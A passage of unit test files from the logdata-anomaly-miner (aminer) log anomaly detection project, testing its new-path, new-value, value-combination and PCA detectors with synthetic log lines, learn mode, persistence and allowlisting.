logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchPathDetectorTest.py000066400000000000000000000403531437606560100310430ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.input.LogAtom import LogAtom import time from datetime import datetime from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class NewMatchPathDetectorTest(TestBase): """Unittests for the NewMatchPathDetector.""" __expected_string = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n%s\n\n' match_path_s1 = "['/s1']" match_path_d1 = "['/d1']" datetime_format_string = '%Y-%m-%d %H:%M:%S' analysis = 'Analysis.%s' pid = " pid=" uid = " uid=2" match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) match_context_decimal_integer_value_me = MatchContext(b'25537 uid=2') decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_element_decimal_integer_value_me = decimal_integer_value_me.get_match_element("", match_context_decimal_integer_value_me) def test1_log_atom_not_known(self): """ This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found. The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be repeatable on second run. """ description = "Test1NewMatchPathDetector" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) t = round(time.time(), 3) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data, ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector) self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1, self.match_path_s1, self.pid)) self.reset_output_stream() # repeating should produce the same result self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1, self.match_path_s1, self.pid)) self.reset_output_stream() # other MatchElement self.assertTrue(new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1, self.match_path_d1, self.uid)) def test2_log_atom_known(self): """ This test case checks the functionality of the learn_mode. If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered. """ description = "Test2NewMatchPathDetector" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) t = round(time.time(), 3) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) log_atom_decimal_integer_value_me = LogAtom(self.match_context_decimal_integer_value_me.match_data, ParserMatch(self.match_element_decimal_integer_value_me), t, new_match_path_detector) self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1, self.match_path_s1, self.pid)) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), '') self.reset_output_stream() # other MatchElement self.assertTrue(new_match_path_detector.receive_atom(log_atom_decimal_integer_value_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1, self.match_path_d1, self.uid)) def test3_log_atom_known_from_persisted_data(self): """The persisting and reading of permitted log lines should be checked with this test.""" description = "Test3NewMatchPathDetector" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) t = round(time.time(), 3) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) self.assertTrue(new_match_path_detector.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_detector.__class__.__name__, description, 1, self.match_path_s1, self.pid)) new_match_path_detector.do_persist() self.reset_output_stream() otherNewMatchPathDetector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', False, output_logline=False) otherLogAtomFixedDME = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, otherNewMatchPathDetector) self.assertTrue(otherNewMatchPathDetector.receive_atom(otherLogAtomFixedDME)) self.assertEqual(self.output_stream.getvalue(), '') def test4_get_time_trigger_class(self): """ The known paths are to be periodically stored after a certain time. This requires a synchronization class. The return of the correct class is to be checked in this test case. """ new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, output_logline=False) self.assertEqual(new_match_path_detector.get_time_trigger_class(), 1) # skipcq: PYL-W0105 """The following test cases should check if the doTimer() method is working properly.This includes the updating of nextPersistTime. As it is not updated directly in the method this test cases are not correct. Due to that they are commented.""" # def test5_do_timer_next_persist_time_none(self): # """During initialization, the next time is not determined (the value is initialized with None). In this case, the persistence is # expected to occur after 600 milliseconds.""" # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, # output_logline=False) # self.assertEqual(self.new_match_path_detector.do_timer(200), 600) # self.assertEqual(self.new_match_path_detector.do_timer(400), 600) # self.assertEqual(self.new_match_path_detector.do_timer(10000), 600) # # def test6_do_timer_delta_smaller_or_equal_zero(self): # """If the NextPersistTime is less than or equal to zero, the data must be saved.""" # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, # output_logline=False) # self.new_match_path_detector.nextPersistTime = 400 # self.assertEqual(self.new_match_path_detector.do_timer(400), 600) # self.assertEqual(self.new_match_path_detector.do_timer(1000), 600) # # def test7_do_timer_delta_greater_zero(self): # """If the delta does not fall below the limit value, only the delta value should be returned.""" # # this test fails due to the missing update of the nextPersistTime variable in the doTimer method # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, # output_logline=False) # self.new_match_path_detector.nextPersistTime = 400 # self.assertEqual(self.new_match_path_detector.do_timer(200), 200) # self.assertEqual(self.new_match_path_detector.do_timer(200), 600) # self.assertEqual(self.new_match_path_detector.do_timer(100), 500) def test8_allowlist_event_type_exception(self): """This test case checks whether an exception is thrown when entering an event of another class.""" description = "Test8NewMatchPathDetector" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) t = round(time.time(), 3) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [], [self.stream_printer_event_handler], 'Default', True, True) self.assertRaises( Exception, new_match_path_detector.allowlist_event, self.analysis % new_match_path_value_combo_detector.__class__.__name__, self.output_stream.getvalue(), None) def test9_allowlist_event_allowlisting_data_exception(self): """The NewMatchPathDetector can not handle allowlisting data and therefore an exception is expected.""" description = "Test9NewMatchPathDetector" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) t = round(time.time(), 3) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) self.assertRaises(Exception, new_match_path_detector.allowlist_event, self.analysis % new_match_path_detector.__class__.__name__, self.output_stream.getvalue(), ['random', 'Data']) def test10_allowlist_event_with_known_and_unknown_paths(self): """This test case checks in which cases an event is triggered and compares with expected results.""" description = "Test10NewMatchPathDetector" new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_detector, description) t = round(time.time(), 3) log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_fixed_dme), t, new_match_path_detector) new_match_path_detector.receive_atom(log_atom_fixed_dme) self.assertEqual(new_match_path_detector.allowlist_event( self.analysis % new_match_path_detector.__class__.__name__, self.match_element_fixed_dme.get_path(), None), 'Allowlisted path(es) %s in %s.' % ( self.match_element_fixed_dme.get_path(), self.analysis % new_match_path_detector.__class__.__name__)) new_match_path_detector.learn_mode = False self.assertEqual(new_match_path_detector.allowlist_event( self.analysis % new_match_path_detector.__class__.__name__, self.match_element_decimal_integer_value_me.get_path(), None), 'Allowlisted path(es) %s in %s.' % ( self.match_element_decimal_integer_value_me.path, self.analysis % new_match_path_detector.__class__.__name__)) # ''' # This test case checks what happens when no EventHandler is used in the parameters. Requires type check (not yet implemented). # ''' # def test11_fuzzing_anomaly_event_handler(self): # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, None, 'Default', True, output_logline=False) # t = datetime.fromtimestamp(time.time()) # self.log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, # ParserMatch(self.match_context_fixed_dme), t, self.new_match_path_detector) # self.assertRaises(AttributeError, self.new_match_path_detector.receive_atom, self.log_atom_fixed_dme) # # #At least one EventHandler should be used, else the Detector can not report anomalies # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, [], 'Default', True) # self.log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, # ParserMatch(self.match_element_fixed_dme), t, self.new_match_path_detector) # self.assertRaises(Exception, self.new_match_path_detector.receive_atom, self.log_atom_fixed_dme) # # ''' # An attempt is made to use a non-Boolean expression for the autoIncludeFlag. Requires type check (not yet implemented). # ''' # def test12_fuzzing_learn_mode(self): # self.assertRaises(ArgumentTypeError, NewMatchPathDetector, self.aminer_config, # [self.stream_printer_event_handler], 'Default', None) # self.assertRaises(ArgumentTypeError, NewMatchPathDetector, self.aminer_config, # [self.stream_printer_event_handler], 'Default', 'True') # # ''' # An exception is expected if no LogAtom is passed as a parameter. Requires type check (not yet implemented). # ''' # def test13_fuzzing_log_atom(self): # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, # [self.stream_printer_event_handler], 'Default', True) # self.assertRaises(ArgumentTypeError, self.new_match_path_detector.receive_atom, self.aminer_config) # # ''' # The data type must be checked before calculating the remaining time Requires type check (not yet implemented). # ''' # def test14_fuzzing_trigger_time(self): # self.new_match_path_detector = NewMatchPathDetector(self.aminer_config, # [self.stream_printer_event_handler], 'Default', True) # self.new_match_path_detector.nextPersistTime = 400 # self.assertRaises(ArgumentTypeError, self.new_match_path_detector.do_timer, '200') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchPathValueComboDetectorTest.py000066400000000000000000000253021437606560100330150ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.input.LogAtom import LogAtom import time from unit.TestBase import TestBase from datetime import datetime class NewMatchPathValueComboDetectorTest(TestBase): """Unittests for the NewMatchPathValueComboDetector.""" __expected_string = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' fixed_dme = FixedDataModelElement('s1', b'25537 uid=') fixed_dme2 = FixedDataModelElement('s2', b' uid=2') datetime_format_string = '%Y-%m-%d %H:%M:%S' first_seq_s1 = 'first/seq/s1' first_seq_d1 = 'first/seq/d1' string = " first/seq: b'25537 uid=2'\n " + first_seq_s1 + ": 25537 uid=\n " + first_seq_d1 + ": 2\n(b'25537 uid=', 2)" string2 = " (b'25537 uid=', 2)\n25537 uid=2" decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) match_context_sequence_me2 = MatchContext(b'25537 uid=2') seq2 = SequenceModelElement('seq2', [decimal_integer_value_me, fixed_dme2]) match_element_sequence_me2 = seq2.get_match_element('second', match_context_sequence_me2) def test1_log_atom_not_known(self): """ This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found. The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be repeatable on second run. """ description = "Test1NewMatchPathValueComboDetector" new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [ self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(new_match_path_value_combo_detector, description) t = time.time() log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, new_match_path_value_combo_detector) self.assertTrue(new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_combo_detector.__class__.__name__, description, 1, self.string2)) self.reset_output_stream() # repeating should produce the same result self.assertTrue(new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_combo_detector.__class__.__name__, description, 1, self.string2)) self.reset_output_stream() new_match_path_value_combo_detector2 = NewMatchPathValueComboDetector(self.aminer_config, ['second/seq2/d1', 'second/seq2/s2'], [ self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(new_match_path_value_combo_detector2, description + "2") log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, new_match_path_value_combo_detector2) # other MatchElement self.assertTrue(new_match_path_value_combo_detector2.receive_atom(log_atom_sequence_me2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " (25537, b' uid=2')\n25537 uid=2")) def test2_log_atom_known(self): """ This test case checks the functionality of the learn_mode. If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered. """ description = "Test2NewMatchPathValueComboDetector" new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [ self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(new_match_path_value_combo_detector, description) t = time.time() log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, new_match_path_value_combo_detector) self.assertTrue(new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_combo_detector.__class__.__name__, description, 1, self.string2)) self.reset_output_stream() # repeating should NOT produce the same result self.assertTrue(new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), '') self.reset_output_stream() new_match_path_value_combo_detector2 = NewMatchPathValueComboDetector(self.aminer_config, ['second/seq2/d1', 'second/seq2/s2'], [ self.stream_printer_event_handler], 'Default', False, False, output_logline=False) self.analysis_context.register_component(new_match_path_value_combo_detector2, description + "2") log_atom_sequence_me2 = LogAtom(self.match_element_sequence_me2.get_match_string(), ParserMatch(self.match_element_sequence_me2), t, new_match_path_value_combo_detector2) # other MatchElement self.assertTrue(new_match_path_value_combo_detector2.receive_atom(log_atom_sequence_me2)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_combo_detector.__class__.__name__, description + "2", 1, " (25537, b' uid=2')\n25537 uid=2")) def test3_log_atom_known_from_persisted_data(self): """The persisting and reading of permitted log lines should be checked with this test.""" description = "Test3NewMatchPathValueComboDetector" new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [ self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(new_match_path_value_combo_detector, description) t = time.time() log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, new_match_path_value_combo_detector) self.assertTrue(new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_combo_detector.__class__.__name__, description, 1, self.string2)) new_match_path_value_combo_detector.do_persist() self.reset_output_stream() other_new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [ self.first_seq_s1, self.first_seq_d1], [self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(other_new_match_path_value_combo_detector, description + "2") other_log_atom_fixed_dme = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, other_new_match_path_value_combo_detector) self.assertTrue(other_new_match_path_value_combo_detector.receive_atom(other_log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), '') def test4_allowlist_event_with_known_and_unknown_paths(self): """This test case checks in which cases an event is triggered and compares with expected results.""" description = "Test4NewMatchPathValueComboDetector" new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, [self.first_seq_s1, self.first_seq_d1], [ self.stream_printer_event_handler], 'Default', False, True, output_logline=False) self.analysis_context.register_component(new_match_path_value_combo_detector, description) t = time.time() log_atom_sequence_me = LogAtom(self.match_element_sequence_me.get_match_string(), ParserMatch(self.match_element_sequence_me), t, new_match_path_value_combo_detector) new_match_path_value_combo_detector.receive_atom(log_atom_sequence_me) self.assertEqual( new_match_path_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_path_value_combo_detector.__class__.__name__, self.match_element_sequence_me.get_path(), None), 'Allowlisted path(es) %s with %s.' % ( ", ".join(new_match_path_value_combo_detector.target_path_list), self.match_element_sequence_me.get_path())) new_match_path_value_combo_detector.learn_mode = False self.assertEqual( new_match_path_value_combo_detector.allowlist_event( 'Analysis.%s' % new_match_path_value_combo_detector.__class__.__name__, self.match_element_sequence_me2.get_path(), None), 'Allowlisted path(es) %s with %s.' % ( ", ".join(new_match_path_value_combo_detector.target_path_list), self.match_element_sequence_me2.path)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/NewMatchPathValueDetectorTest.py000066400000000000000000000223251437606560100320370ustar00rootroot00000000000000import unittest from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from time import time from datetime import datetime class NewMatchPathValueDetectorTest(TestBase): """Unittests for the NewMatchPathValueDetector.""" __expected_string = '%s New value(s) detected\n%s: "%s" (%d lines)\n %s\n\n' analysis = 'Analysis.%s' datetime_format_string = '%Y-%m-%d %H:%M:%S' string = b'25537 uid=2' first_f1_s1 = 'first/f1/s1' string2 = "{'first/f1/s1': '25537 uid=2'}" fixed_dme = FixedDataModelElement('s1', string) decimal_integer_value_me = DecimalIntegerValueModelElement('d1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_first_match_me = MatchContext(string) first_match_me = FirstMatchModelElement('f1', [fixed_dme, decimal_integer_value_me]) match_element_first_match_me = first_match_me.get_match_element('first', match_context_first_match_me) match_context_first_match_me2 = MatchContext(string) first_match_me2 = FirstMatchModelElement('f2', [decimal_integer_value_me, fixed_dme]) match_element_first_match_me2 = first_match_me2.get_match_element('second', match_context_first_match_me2) def test1_log_atom_not_known(self): """ This test case checks the correct processing of unknown log lines, which in reality means that an anomaly has been found. The output is directed to an output stream and compared for accuracy. The learn_mode is False and the output must be repeatable on second run. """ description = "Test1NewMatchPathValueDetector" new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [ self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector, description) t = time() log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_detector) new_match_path_value_detector.receive_atom(log_atom_sequence_me) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__, description, 1, self.string2)) self.reset_output_stream() # repeating should produce the same result new_match_path_value_detector.receive_atom(log_atom_sequence_me) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__, description, 1, self.string2)) self.reset_output_stream() new_match_path_value_detector2 = NewMatchPathValueDetector(self.aminer_config, ['second/f2/d1'], [ self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector2, description + "2") log_atom_sequence_me2 = LogAtom(b'25537', ParserMatch(self.match_element_first_match_me2), t, new_match_path_value_detector2) # other MatchElement new_match_path_value_detector2.receive_atom(log_atom_sequence_me2) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__, description + "2", 1, "{'second/f2/d1': 25537}")) def test2_log_atom_known(self): """ This test case checks the functionality of the learn_mode. If the same MatchElement is processed a second time and the learn_mode was True, no event must be triggered. """ description = "Test2NewMatchPathValueDetector" new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [ self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector, description) t = time() log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_detector) new_match_path_value_detector.receive_atom(log_atom_sequence_me) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__, description, 1, self.string2)) self.reset_output_stream() # repeating should NOT produce the same result new_match_path_value_detector.receive_atom(log_atom_sequence_me) self.assertEqual(self.output_stream.getvalue(), '') self.reset_output_stream() new_match_path_value_detector2 = NewMatchPathValueDetector(self.aminer_config, ['second/f2/d1'], [ self.stream_printer_event_handler], 'Default', False, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector2, description + "2") log_atom_sequence_me2 = LogAtom(b'25537', ParserMatch(self.match_element_first_match_me2), t, new_match_path_value_detector2) # other MatchElement new_match_path_value_detector2.receive_atom(log_atom_sequence_me2) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__, description + "2", 1, "{'second/f2/d1': 25537}")) def test3log_atom_known_from_persisted_data(self): """The persisting and reading of permitted log lines should be checked with this test.""" description = "Test3NewMatchPathValueDetector" new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [ self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector, description) t = time() log_atom_sequence_me = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, new_match_path_value_detector) new_match_path_value_detector.receive_atom(log_atom_sequence_me) self.assertEqual(self.output_stream.getvalue(), self.__expected_string % ( datetime.fromtimestamp(t).strftime(self.datetime_format_string), new_match_path_value_detector.__class__.__name__, description, 1, self.string2)) new_match_path_value_detector.do_persist() self.reset_output_stream() other_new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [ self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector, description + "2") other_log_atom_fixed_dme = LogAtom(self.fixed_dme.fixed_data, ParserMatch(self.match_element_first_match_me), t, other_new_match_path_value_detector) other_new_match_path_value_detector.receive_atom(other_log_atom_fixed_dme) self.assertEqual(self.output_stream.getvalue(), '') def test4allowlist_event(self): """Test the allowlist_event method.""" description = "Test4NewMatchPathValueDetector" new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, [self.first_f1_s1], [ self.stream_printer_event_handler], 'Default', True, output_logline=False) self.analysis_context.register_component(new_match_path_value_detector, description) self.assertEqual(set(), new_match_path_value_detector.known_values_set) # an unknown value should be allowlisted new_match_path_value_detector.allowlist_event( self.analysis % new_match_path_value_detector.__class__.__name__, self.fixed_dme.fixed_data.decode(), None) self.assertEqual({self.fixed_dme.fixed_data.decode()}, new_match_path_value_detector.known_values_set) # an known value should be allowlisted new_match_path_value_detector.allowlist_event(self.analysis % new_match_path_value_detector.__class__.__name__, self.fixed_dme.fixed_data.decode(), None) self.assertEqual({self.fixed_dme.fixed_data.decode()}, new_match_path_value_detector.known_values_set) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/PCADetectorTest.py000066400000000000000000000140111437606560100271130ustar00rootroot00000000000000import unittest from aminer.analysis.PCADetector import PCADetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomalies = [] # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomalies.append(evdat) class PCADetectorTest(TestBase): """Unittests for the PCADetector.""" def test1_normal_pca_detection(self): """This test case checks the normal detection of value frequencies using PCA.""" description = "Test1PCADetector" # Initialize detector for analyzing values in one path in time windows of 10 seconds test_handler = TestHandler() pca_detector = PCADetector(self.aminer_config, ['/value'], [test_handler], 10, 2, 0.9, 3, 'Default', True, output_logline=False) self.analysis_context.register_component(pca_detector, description) # Prepare log atoms that represent different amounts of values a, b over time # Five time windows are used. The first three time windows are used for initializing # the count matrix. The fourth window is used to verify the anomaly score computation. # The fifth time window is only used to mark the end of the fourth time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 1 times # value b: 1 time # window 3: # value a: 1 time # value b: 0 times # window 4: # value a: 4 time # value b: 1 time # window 5: # value a: 1 time # Start of window 1: m_1 = MatchElement('/value', b'a', b'a', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'a', parser_match_1, 1, None) m_2 = MatchElement('/value', b'b', b'b', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'b', parser_match_2, 3, None) m_3 = MatchElement('/value', b'a', b'a', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'a', parser_match_3, 7, None) # Start of window 2: m_4 = MatchElement('/value', b'a', b'a', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'a', parser_match_4, 13, None) m_5 = MatchElement('/value', b'b', b'b', None) parser_match_5 = ParserMatch(m_5) log_atom_5 = LogAtom(b'b', parser_match_5, 15, None) # Start of window 3: m_6 = MatchElement('/value', b'a', b'a', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'b', parser_match_6, 27, None) # Start of window 4: m_7 = MatchElement('/value', b'a', b'a', None) parser_match_7 = ParserMatch(m_7) log_atom_7 = LogAtom(b'a', parser_match_7, 33, None) m_8 = MatchElement('/value', b'a', b'a', None) parser_match_8 = ParserMatch(m_8) log_atom_8 = LogAtom(b'a', parser_match_8, 34, None) m_9 = MatchElement('/value', b'a', b'a', None) parser_match_9 = ParserMatch(m_9) log_atom_9 = LogAtom(b'a', parser_match_9, 36, None) m_10 = MatchElement('/value', b'a', b'a', None) parser_match_10 = ParserMatch(m_10) log_atom_10 = LogAtom(b'a', parser_match_10, 37, None) m_11 = MatchElement('/value', b'b', b'b', None) parser_match_11 = ParserMatch(m_11) log_atom_11 = LogAtom(b'b', parser_match_11, 38, None) # Start of window 5: m_12 = MatchElement('/value', b'a', b'a', None) parser_match_12 = ParserMatch(m_12) log_atom_12 = LogAtom(b'a', parser_match_12, 45, None) # Forward log atoms to detector # Log atoms of windows 1 to 3 build up the count matrix # Input: log atoms of windows 1 to 3 # Expected output: No anomalies reported 